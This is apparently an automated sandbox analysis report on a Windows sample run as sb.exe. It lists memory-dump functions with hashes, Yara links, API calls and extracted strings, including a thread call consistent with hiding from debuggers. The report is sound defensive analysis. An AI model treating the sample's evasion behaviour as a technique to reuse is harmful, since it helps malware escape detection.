Instruction ID: 5371fdfed8fa9944b73392c934ccb1fb12a893f62233491f9621fd44e93bdc16
Opcode Fuzzy Hash: 4857c4fcca5f28589bdf33429f83a7546305adbd82989a5c0117b7e87163f97e
Instruction Fuzzy Hash: 7FF01C74905354DFC704EFA8E8ACA9DBBB1FF19304F20416AE415A7395DB385841DF01

Uniqueness

Uniqueness Score: -1.00%

Function 003203A0, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9f5517956f032d8a24fe37183d9366f3e811a2d4d9545c468d4b6b50a646c4a
Instruction ID: 6c6401c7b454c120b33e2e3da517d0a775b3ca1ad3ef3f0625727ff04e57d0ad
Opcode Fuzzy Hash: a9f5517956f032d8a24fe37183d9366f3e811a2d4d9545c468d4b6b50a646c4a
Instruction Fuzzy Hash: 1DE08C3484120CEBCB06EFD4D841AADBB71AB45300F1081A5EA0027250C6314B64EB95

Uniqueness

Uniqueness Score: -1.00%

Function 003202C9, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e5d4b55ae198a9f164484543cfd91b171dcd5488e54638baf807f8f01b1558
Instruction ID: fd865ebebc274b1a31e252797add673ab6ea85a4da9b117ac04a7afaa06c1a1f
Opcode Fuzzy Hash: 29e5d4b55ae198a9f164484543cfd91b171dcd5488e54638baf807f8f01b1558
Instruction Fuzzy Hash: 7DE0C23084E3808FD30BDBA45A1436EBB708B83200F2416DFC884A36A3D5344E18C766

Uniqueness

Uniqueness Score: -1.00%

Function 00320358, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b39f84eeee5f110d17cd75c68f9a79c489db3ef8fec18cb7642766acb4ea515
Instruction ID: 9a6660a135b70c5f89bd9f7726247f4f50c61a6ff6f16b2b2643ae17495e0ca6
Opcode Fuzzy Hash: 0b39f84eeee5f110d17cd75c68f9a79c489db3ef8fec18cb7642766acb4ea515
Instruction Fuzzy Hash: 46E0C234C41208EBCB05EFD0D941AAEBB74BB41300F1041A9E90023391C7304E54DBD5

Uniqueness

Uniqueness Score: -1.00%

Function 0032F82F, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3e3eb0f48d64bd980459007a65497cb211d8d9cf8788eb3b325606254c19bd2
Instruction ID: a9338caa2977f189ae89ed1637c34e71ca1fd108373143d631a991059d99abd7
Opcode Fuzzy Hash: f3e3eb0f48d64bd980459007a65497cb211d8d9cf8788eb3b325606254c19bd2
Instruction Fuzzy Hash: EBD0233658F004D7C701458078401FCB77CA9C3314F3510F74C1C1340BD11149145058

Uniqueness

Uniqueness Score: -1.00%

Function 00325918, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a54675ab33b5fe81be70eb8aa71b85ae4b1616777ca85633cc46085ab6137172
Instruction ID: 3269a38cae11e904d103bc0f9c53759a303e23da243f50b87b0d08a3814ae708
Opcode Fuzzy Hash: a54675ab33b5fe81be70eb8aa71b85ae4b1616777ca85633cc46085ab6137172
Instruction Fuzzy Hash: 53E01A71C05208EFCB16DFA4D54469CBBB1EB45310F5082AEDC4863710D3354BA4DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00320318, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dc1e83a2823952bcdc2c6f3589878a599f0c2f4c4705860b02fd1c5b08352fa
Instruction ID: b12d9b3f270a7f948ea761597ac6a2948b13461613594c95fb24db342084258b
Opcode Fuzzy Hash: 5dc1e83a2823952bcdc2c6f3589878a599f0c2f4c4705860b02fd1c5b08352fa
Instruction Fuzzy Hash: D2D05B34D41108DBC705EFE4D94566DB774A741301F2041A9D94433341C7705F54C6D5

Uniqueness

Uniqueness Score: -1.00%

Function 00323F03, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eaf21f1427d15301586d5f63a6ffadc5261c438c8be86c6c32b385f167824d7
Instruction ID: 4debbc42ed1ad4607c2a1afe0d0e85aa389cb6bf2884f27cf0a38bef444b19f9
Opcode Fuzzy Hash: 6eaf21f1427d15301586d5f63a6ffadc5261c438c8be86c6c32b385f167824d7
Instruction Fuzzy Hash: 33E08C34D05004EBCB06DFA4EA8499CBBB0FB81301F24829ECC0863350DB318A56CA40

Uniqueness

Uniqueness Score: -1.00%

Function 00321790, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c02530e9ef45280d7581322d57546e2f6e8d18cfbf90366c84ba74572c435beb
Instruction ID: eaef9ad5da2e70e7e9a78655d10257b2c93c080172f22d03db893b63ae310065
Opcode Fuzzy Hash: c02530e9ef45280d7581322d57546e2f6e8d18cfbf90366c84ba74572c435beb
Instruction Fuzzy Hash: 70D05B318133089FC7066FF4A64D1697B74FB57301F1056B9DC0852114D7701594D795

Uniqueness

Uniqueness Score: -1.00%

Function 009B0DFA, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2228242989.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 855e7741177f0fb1f82dea906aa911653ea8c93e7cbb8f9dca987212fc667e35
Instruction ID: a567a0bd94dae6c851eb7ce0ec58d371caffc79a05ab4692d875d648238b5148
Opcode Fuzzy Hash: 855e7741177f0fb1f82dea906aa911653ea8c93e7cbb8f9dca987212fc667e35
Instruction Fuzzy Hash: 14F0A574904214CFDB64CF24C94479CBBB4BB49320F1085D9985DA7391DF344E849F10

Uniqueness

Uniqueness Score: -1.00%

Function 00324200, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa84e69158c02c31362d7e9e59b0b175220a6765310bff7e6770182f0301b9c7
Instruction ID: 77ef7c541e702a87793f4ed127a37c4334f1593b36a101f9a9d05a33e8ee105a
Opcode Fuzzy Hash: aa84e69158c02c31362d7e9e59b0b175220a6765310bff7e6770182f0301b9c7
Instruction Fuzzy Hash: E8D0A73008A3D06EC70B67B0B8195513FE0AB03308B0711EBD445DB4F3D3340849D722

Uniqueness

Uniqueness Score: -1.00%

Function 003202D8, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea10b860ae6b7802cd5b497fae5bf79de41a3e034e654c3028174eeae7eb0bf5
Instruction ID: 218e7118a846b33575db0372835ea43360db24973294e45af6edc41d9a45f30a
Opcode Fuzzy Hash: ea10b860ae6b7802cd5b497fae5bf79de41a3e034e654c3028174eeae7eb0bf5
Instruction Fuzzy Hash: AAD0A730842208D7C305DED4950476AB368D783300F10129598041334189305E00C2D5

Uniqueness

Uniqueness Score: -1.00%

Function 00322B18, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e533d19b5eb9ea5102bd33561e3aef9cd8a5f5c392b80e8fcae0dd59f7f065e
Instruction ID: 4ffc97a6863739289399273dc6b484b3beafa9515a4dac377a27a318c5c54b89
Opcode Fuzzy Hash: 7e533d19b5eb9ea5102bd33561e3aef9cd8a5f5c392b80e8fcae0dd59f7f065e
Instruction Fuzzy Hash: 2BD05E3000A2408EC3172BB069141913FA0EB07716B4A42D7C489C65B2E378488AC722

Uniqueness

Uniqueness Score: -1.00%

Function 001C23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227118081.00000000001C2000.00000040.00000001.sdmp, Offset: 001C2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74962221d6bd1e8ae0e1da9bd960162ca0ee4fb05e3a52124a9bc0abf577043f
Instruction ID: 7cd60818d89a4946b052d66e1eb5762bd0485fee3617483a63351b0068c4859c
Opcode Fuzzy Hash: 74962221d6bd1e8ae0e1da9bd960162ca0ee4fb05e3a52124a9bc0abf577043f
Instruction Fuzzy Hash: 13D05E79304A818FD71A8A1CC1A4F9537E4AB61B04F5644FDE800CB6A3C778E981D200

Uniqueness

Uniqueness Score: -1.00%

Function 003242AC, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfe7a1ce89748536464af8c4d95f44a1f080f1896c8147664764bab56d53db52
Instruction ID: 7ad26cf5c205a93317d1ef02fe662ec8a06e78915b90c34c16c5100eb8106093
Opcode Fuzzy Hash: dfe7a1ce89748536464af8c4d95f44a1f080f1896c8147664764bab56d53db52
Instruction Fuzzy Hash: C6D05E35907618DBC706EFE4F94965CBB70AB41315F5042AAD844A33A0F7304E88CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00321798, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65d20071b23bbeafcfc0bbfbcae38c02b0b8e7ea76d1e9f2eab4cea34dba4e9e
Instruction ID: 84b885b8e869b79756b69544fdb0617b7155b37a40044ec837458d4ca4619583
Opcode Fuzzy Hash: 65d20071b23bbeafcfc0bbfbcae38c02b0b8e7ea76d1e9f2eab4cea34dba4e9e
Instruction Fuzzy Hash: 37D02330C133088BC3056FA4790C16D7B78F743302F1013A9CC0423200D7701694C6D5

Uniqueness

Uniqueness Score: -1.00%

Function 00324BC0, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4af0e90c9e9095471f8e6f978b78cfd118f98c0a59cdb9b8ae88410a91dbc495
Instruction ID: ee1c1016b39f59a47a20f4f5025492b41fd75c9fc56bfed46394fe0cbe39b4cd
Opcode Fuzzy Hash: 4af0e90c9e9095471f8e6f978b78cfd118f98c0a59cdb9b8ae88410a91dbc495
Instruction Fuzzy Hash: 78D05E30C02308DBC706EFA8E44469CBBB5AB41305F5042E9C84467341E7319A94CB82

Uniqueness

Uniqueness Score: -1.00%

Function 001C23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227118081.00000000001C2000.00000040.00000001.sdmp, Offset: 001C2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04e59c20171c5c139d55a28fd9f0f946513f3ac91fed3ad8482a8cef5dc07347
Instruction ID: 26f7de9f37a1dbc528d1e82702fc7cb69449b413df9e5ccc84baadfa86638388
Opcode Fuzzy Hash: 04e59c20171c5c139d55a28fd9f0f946513f3ac91fed3ad8482a8cef5dc07347
Instruction Fuzzy Hash: 17D052343006818BDB2ACA0CC294F5973E8BB94B00F0644ECFC008B2A6C3B8EC80CA00

Uniqueness

Uniqueness Score: -1.00%

Function 003217C8, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e599d4aeb1d365ab547add6e5ee66be0bfc5ed043b2fe3037dee333f6585107c
Instruction ID: e01d91a0dec9a373f3124f67283181d498137bc233180159b51399b7d671a58f
Opcode Fuzzy Hash: e599d4aeb1d365ab547add6e5ee66be0bfc5ed043b2fe3037dee333f6585107c
Instruction Fuzzy Hash: F3C08C320A320287C22B1BE8B79D2F573A0AB5332BF202A47D48850D71DA7980DAC5D6

Uniqueness

Uniqueness Score: -1.00%

Function 0032E1B3, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2c19c52116256e3059f116d20656b89a8d9196e6c70b80f637b2c17b3cdab64
Instruction ID: 7f05674805be8432425a76b9d08422363beecb617b8dfc36bd07c020ab9cb559
Opcode Fuzzy Hash: a2c19c52116256e3059f116d20656b89a8d9196e6c70b80f637b2c17b3cdab64
Instruction Fuzzy Hash: 81E0EC709052298FDBC0AF24C899779F6B5FF15300F2180E9D54DAB246CB318A459F46

Uniqueness

Uniqueness Score: -1.00%

Function 00324210, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df3fc17545a4dbf43128b4484d51900b1d4bacb582c5ef7251acd047fecd16ea
Instruction ID: 2e97e6adf0818efacaa37a4620eb54c582ef363c0602dc306875098fcda2d877
Opcode Fuzzy Hash: df3fc17545a4dbf43128b4484d51900b1d4bacb582c5ef7251acd047fecd16ea
Instruction Fuzzy Hash: 5CB02B3004222841C30772C0780573073C91341304F410112590C219925B300454C0D2

Uniqueness

Uniqueness Score: -1.00%

Function 00322B28, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cd71250789d5fb3319132140be0e419c8b721af61f488f2487be059721b7c04
Instruction ID: 5b3de825ae497df69da75700d5c82cdaa1bfce5eac93477656f97deff9d21b01
Opcode Fuzzy Hash: 6cd71250789d5fb3319132140be0e419c8b721af61f488f2487be059721b7c04
Instruction Fuzzy Hash: 98C02B3000760883C2172FC47C0C33173C8A347302F400153CD8C019F0ABB04C80C292

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00322B47, Relevance: 3.9, Strings: 3, Instructions: 161COMMON

Download Yara Rule

Strings

R]qq, xrefs: 00322BA2
*_qq, xrefs: 00322CB6
:@lq, xrefs: 00322C99

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID: *_qq$:@lq$R]qq
API String ID: 0-403329157
Opcode ID: 42d4626f585752090f93b53224715be95d3cbcdd690b9acdb0f3f12ee370725b
Instruction ID: 9d2d92be7847243b8a55a516995e92dda743a95cd93b0fdec340a4778afb6ce0
Opcode Fuzzy Hash: 42d4626f585752090f93b53224715be95d3cbcdd690b9acdb0f3f12ee370725b
Instruction Fuzzy Hash: B6610B70A02249CFD708EFAAD955789BBF3FB85308F54C02AD4089B2A8EB745955CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00322B58, Relevance: 3.9, Strings: 3, Instructions: 156COMMON

Download Yara Rule

Strings

R]qq, xrefs: 00322BA2
*_qq, xrefs: 00322CB6
:@lq, xrefs: 00322C99

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID: *_qq$:@lq$R]qq
API String ID: 0-403329157
Opcode ID: e2bd1d582a1619bb91f9a149fb69e392b99a886211d428b18ea27c211b41421e
Instruction ID: 565ba4e4600afefad9e04e3e116adc804c0f984a78fceda058f0082b6218d8b3
Opcode Fuzzy Hash: e2bd1d582a1619bb91f9a149fb69e392b99a886211d428b18ea27c211b41421e
Instruction Fuzzy Hash: 7A61FB70A02249CFD708EFAAE85574DBBF3FBD5308F54C02AD0089B2A8EB745955DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00340C5F, Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

r, xrefs: 00340C61

Memory Dump Source

Source File: 00000018.00000002.2227516584.0000000000340000.00000040.00000040.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 0f663434fd13073bc341440b6b5e92e74e27f1216c04734a6548ba44f4c7c4ac
Instruction ID: 80e9ecc63678cd53b09c3505f0f5fd92d196ff45c9600859997218283f4cbb63
Opcode Fuzzy Hash: 0f663434fd13073bc341440b6b5e92e74e27f1216c04734a6548ba44f4c7c4ac
Instruction Fuzzy Hash: 7131E39690E7C02FEB178B348C625923FB19E27354B1F14DBC1C1CF0A3E569590AD366

Uniqueness

Uniqueness Score: -1.00%

Function 0032F904, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33715ee60da569f445c09568e2090a91eaae60adb41dcf233c435b808f5081c3
Instruction ID: ac57cc87b5f7b787018f210918547a34cb69efc369575aceeaeeb2e352aa4f6a
Opcode Fuzzy Hash: 33715ee60da569f445c09568e2090a91eaae60adb41dcf233c435b808f5081c3
Instruction Fuzzy Hash: 6E216A21A0C2D47ECB03A6785811AA53FB54E4732872993F6D1E2CB6F3D3214982E782

Uniqueness

Uniqueness Score: -1.00%

Function 003251C8, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2227473904.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 926b4b3f445005665025d96ba601cbdc7a15b9c7721a215b21f4c9201a0a63fd
Instruction ID: 3b85d878f28ae319e613d302fec7e2b48fa3b569df8f90a18df703c798975fcb
Opcode Fuzzy Hash: 926b4b3f445005665025d96ba601cbdc7a15b9c7721a215b21f4c9201a0a63fd
Instruction Fuzzy Hash: A511C971E056589FEB19CF6BD84079EBAF3AFC9300F14C1BAD408A6265EB304A45CE51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: sb.exe PID: 1192 Parent PID: 1464 sb.exeCOMMON

Executed Functions

Function 0044A238, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044A23D
new.LIBCMT ref: 0044A263
GetModuleHandleA.KERNEL32(00000000,?,?,00000000), ref: 0044A28A
GetProcAddress.KERNEL32(?,?,?,?,00000000), ref: 0044A2F6
GetSystemInfo.KERNELBASE(?,?,?,?,?,?,00000000), ref: 0044A350
GetProductInfo.KERNEL32(?,?,00000000,00000000,?), ref: 0044A362

Strings

C, xrefs: 0044A2BE

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Info$AddressH_prologHandleModuleProcProductSystem
String ID: C
API String ID: 1760484215-1037565863
Opcode ID: 33d6bb144d07babe7e865a32b2f65c83d434f85cc2b73c6b037fdc2134ee5aa5
Instruction ID: 009187f9c81201dab3b4478d4f28a080c39f07a6fe5d199cd4262a1a6a5f31ab
Opcode Fuzzy Hash: 33d6bb144d07babe7e865a32b2f65c83d434f85cc2b73c6b037fdc2134ee5aa5
Instruction Fuzzy Hash: 97412472D00349AAEB10EFB9DC41AEEFBB9EF54304F10413EE905A7261EB345E488B55

Uniqueness

Uniqueness Score: -1.00%

Function 00478772, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104threadlibrarynativeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00478777
GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00478826
GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000), ref: 0047882D
GetCurrentThread.KERNEL32(00000011,00000000,00000000,?,?,00000000,00000000), ref: 00478865
NtSetInformationThread.NTDLL(?,00000011,00000000,00000000,?,?,00000000,00000000), ref: 0047886C

Strings

{, xrefs: 004787F0

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Thread$AddressCurrentH_prologHandleInformationModuleProc
String ID: {
API String ID: 2756751113-366298937
Opcode ID: 8f28c65f12d23a2e67ce7319abdb53001a4198f6ae775b26233792442d8a0618
Instruction ID: 044747a7e7f62a26b8d36d9ac3d137600a65fbad34c62cb69a76f03b8dc71556
Opcode Fuzzy Hash: 8f28c65f12d23a2e67ce7319abdb53001a4198f6ae775b26233792442d8a0618
Instruction Fuzzy Hash: BC314672D013499ADB10DFFD98846EEBBB8BF64304F24417FE40AA7211DB348E088755

Uniqueness

Uniqueness Score: -1.00%

Function 006A23D1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0069353B), ref: 006A2410

Strings

0A, xrefs: 006A2406
GetSystemTimePreciseAsFileTime, xrefs: 006A23EC

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Time$FileSystem
String ID: 0A$GetSystemTimePreciseAsFileTime
API String ID: 2086374402-3045113000
Opcode ID: f35ae6775cfd4162bfd10032bb2f3a6a330032fbb172f86bd43d0e2b937467c1
Instruction ID: a1ad7a5e52a5685f7f2371d0f95ff5afeef431dcd43e85c2a77f6bbee0945a5d
Opcode Fuzzy Hash: f35ae6775cfd4162bfd10032bb2f3a6a330032fbb172f86bd43d0e2b937467c1
Instruction Fuzzy Hash: 9FE05570A82208BB8710BB18CC06CBE7FABDB06B20B41012AFC014B280DD604E508AE5

Uniqueness

Uniqueness Score: -1.00%

Function 00569841, Relevance: 52.7, APIs: 3, Strings: 27, Instructions: 171COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00569846
new.LIBCMT ref: 0056986D

Part of subcall function 0056912E: __EH_prolog.LIBCMT ref: 00569133
Part of subcall function 0056912E: new.LIBCMT ref: 00569160
Part of subcall function 0056912E: RtlInitializeCriticalSection.NTDLL(0000001C,00000000,00797420,?,?,00569880,?,?,?,0040F0A6), ref: 00569183
Part of subcall function 0056912E: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00569880,?,?,?,0040F0A6), ref: 0056919A

_wprintf.LEGACY_STDIO_DEFINITIONS ref: 005698AE

Strings

Y411, xrefs: 00569950
YVU9, xrefs: 00569942
Y41P, xrefs: 00569963
IYUV, xrefs: 0056991D
IYUV, xrefs: 00569918
UYVY, xrefs: 0056992B
I420, xrefs: 005699D4
Y211, xrefs: 0056996C
AYUV, xrefs: 0056998E
AYUV, xrefs: 00569989
YV12, xrefs: 00569939
YUYV, xrefs: 0056990A
YV12, xrefs: 00569934
YUYV, xrefs: 0056990F
Y41P, xrefs: 0056995E
UYVY, xrefs: 00569926
YUY2, xrefs: 005698EE
MJPG, xrefs: 0056999C
Y211, xrefs: 00569971
I420, xrefs: 005699CF
MJPG, xrefs: 00569997
YVYU, xrefs: 005698FC
***** VIDEOINPUT LIBRARY - %2.04f - TFW07 *****, xrefs: 005698A9
YVU9, xrefs: 00569947
YUY2, xrefs: 005698F3
Y411, xrefs: 00569955
YVYU, xrefs: 00569901

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$CreateCriticalEventInitializeSection_wprintf
String ID: ***** VIDEOINPUT LIBRARY - %2.04f - TFW07 *****$AYUV$AYUV$I420$I420$IYUV$IYUV$MJPG$MJPG$UYVY$UYVY$Y211$Y211$Y411$Y411$Y41P$Y41P$YUY2$YUY2$YUYV$YUYV$YV12$YV12$YVU9$YVU9$YVYU$YVYU
API String ID: 550282347-3367503751
Opcode ID: 9ea17990b845eb72ec66ed40ab00fce0eea12a8a69fbaa200a3da4d192a8331e
Instruction ID: 7ae9071a160ba6b8b37fc6670b78ed947b6d038beff31a4c3460d95eb36020a3
Opcode Fuzzy Hash: 9ea17990b845eb72ec66ed40ab00fce0eea12a8a69fbaa200a3da4d192a8331e
Instruction Fuzzy Hash: B5412A62D28D9587EB4BCE1864052936A939F83724F1A4175BE0C2F362E6FF8D52C7C4

Uniqueness

Uniqueness Score: -1.00%

Function 00414AA6, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 124synchronizationCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414ABB
GetLastError.KERNEL32(?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414ACD

Part of subcall function 0041046E: __EH_prolog.LIBCMT ref: 00410473

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414B0F
GetLastError.KERNEL32(?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414B21
GetLastError.KERNEL32(?,?,?,?,?,?,?,00414E92,00000000), ref: 00414B86
CloseHandle.KERNEL32(00000000), ref: 00414B9C
CloseHandle.KERNEL32(00000000), ref: 00414BAA
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,00414E92,00000000), ref: 00414BDB
CloseHandle.KERNELBASE(00000000), ref: 00414BE2

Strings

thread.exit_event, xrefs: 00414B43
thread.entry_event, xrefs: 00414AEF
thread, xrefs: 00414BC1

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait
String ID: thread$thread.entry_event$thread.exit_event
API String ID: 1613812784-3017686385
Opcode ID: 54ecb7f4cc990d128ff9dd6adcba3b8ab5eabf9a48d6803ac0dabb34691e5255
Instruction ID: d36b434f2dd0b05cf559dbd752a2e27d4b00dd4d6e2787cc1cb756c4aafba879
Opcode Fuzzy Hash: 54ecb7f4cc990d128ff9dd6adcba3b8ab5eabf9a48d6803ac0dabb34691e5255
Instruction Fuzzy Hash: D24174B4A00215AFDB10DFA5C844BAEBBB9EF84750F14416AE845E7341DB74AD81CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0040911C, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 171libraryloaderCOMMON

Download Yara Rule

APIs

new.LIBCMT ref: 004C8734
GetModuleHandleA.KERNEL32(?), ref: 004C87A3
GetProcAddress.KERNEL32(00000000,?), ref: 004C882A
GetModuleHandleA.KERNEL32(?,00000000,00000024), ref: 004C88D9
GetProcAddress.KERNEL32(00000000), ref: 004C88E0
GetNativeSystemInfo.KERNEL32(?), ref: 004C88F2
GetSystemInfo.KERNEL32(?), ref: 004C88FE

Strings

9, xrefs: 004C8768
Y, xrefs: 004C87CC

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressHandleInfoModuleProcSystem$Native
String ID: 9$Y
API String ID: 4128499644-933498875
Opcode ID: c8854cc5d69746fc508a4a1194bd38a194f9e36169c7678442b6afa28b508893
Instruction ID: e5334028a4dcdd2dfaa58a0285a661532b2c157512a1408916922bee01535160
Opcode Fuzzy Hash: c8854cc5d69746fc508a4a1194bd38a194f9e36169c7678442b6afa28b508893
Instruction Fuzzy Hash: F25178315083819AE321DF3CDD45BAAF7E8FF98304F105A1EEAC9D2062EB74E5858746

Uniqueness

Uniqueness Score: -1.00%

Function 00415656, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041565B
EnterCriticalSection.KERNEL32(?), ref: 0041566F
CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00415692
GetLastError.KERNEL32 ref: 0041569F

Part of subcall function 0041046E: __EH_prolog.LIBCMT ref: 00410473

SetWaitableTimer.KERNELBASE ref: 004156EB
new.LIBCMT ref: 004156F9
new.LIBCMT ref: 00415712
LeaveCriticalSection.KERNEL32(?), ref: 00415756

Strings

timer, xrefs: 004156B9

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

